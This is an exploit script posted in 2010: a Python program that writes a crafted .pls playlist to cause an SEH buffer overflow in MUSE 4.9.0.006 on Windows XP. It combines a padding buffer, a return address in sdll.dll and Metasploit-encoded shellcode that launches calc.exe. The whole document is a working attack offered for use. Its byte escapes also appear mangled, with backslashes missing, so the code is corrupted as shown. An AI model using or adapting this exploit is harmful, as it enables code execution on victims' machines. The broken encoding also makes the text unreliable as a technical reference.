muse_pls.py.txt
Posted on 17 August 2010
# Exploit Title: MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH] # Date: August 17, 2010 # Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) # Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html # Version: 4.9.0.006 # Tested on: Windows XP SP3 En payload = "x41" * 1376 payload += "xebx06x90x90" payload += "xAAx0cx02x10" # 10020CAA sdll.dll universal payload += "x90" * 16 # win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com payload += ("xebx03x59xebx05xe8xf8xffxffxffx48x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax68" "x58x30x41x31x50x42x41x6bx41x41x78x32x41x42x41x32" "x42x41x30x42x41x58x50x38x41x42x75x58x69x49x6cx49" "x78x71x54x55x50x37x70x35x50x6cx4bx53x75x55x6cx6e" "x6bx53x4cx74x45x62x58x56x61x4ax4fx4cx4bx30x4fx42" "x38x6ex6bx73x6fx67x50x36x61x48x6bx70x49x6cx4bx66" "x54x4ex6bx64x41x38x6ex74x71x49x50x7ax39x6ex4cx4e" "x64x6bx70x52x54x44x47x4fx31x6bx7ax56x6dx46x61x5a" "x62x5ax4bx78x74x67x4bx70x54x76x44x77x74x42x55x78" "x65x6ex6bx53x6fx36x44x37x71x58x6bx30x66x4ex6bx44" "x4cx62x6bx4ex6bx43x6fx57x6cx57x71x7ax4bx6cx4bx75" "x4cx6ex6bx36x61x38x6bx6ex69x71x4cx44x64x75x54x79" "x53x55x61x69x50x31x74x6ex6bx67x30x64x70x4fx75x59" "x50x43x48x56x6cx6ex6bx41x50x76x6cx6cx4bx72x50x45" "x4cx6cx6dx6ex6bx71x78x77x78x48x6bx66x69x4ex6bx6f" "x70x4cx70x47x70x33x30x53x30x4cx4bx75x38x65x6cx43" "x6fx76x51x78x76x75x30x50x56x4bx39x4bx48x6dx53x6f" "x30x71x6bx76x30x35x38x78x70x4cx4ax75x54x63x6fx33" "x58x4cx58x59x6ex6dx5ax34x4ex56x37x6bx4fx38x67x55" "x33x45x31x30x6cx72x43x76x4ex53x55x53x48x70x65x37" "x70x68") payload += "x90" * 642 try: print "[+] Creating exploit file.." exploit = open('muse.pls','w'); exploit.write(payload); exploit.close(); print "[+] Writing", len(payload), "bytes to muse.pls" print "[+] Exploit file created!" except: print "[-] Error: You do not have correct permissions.."
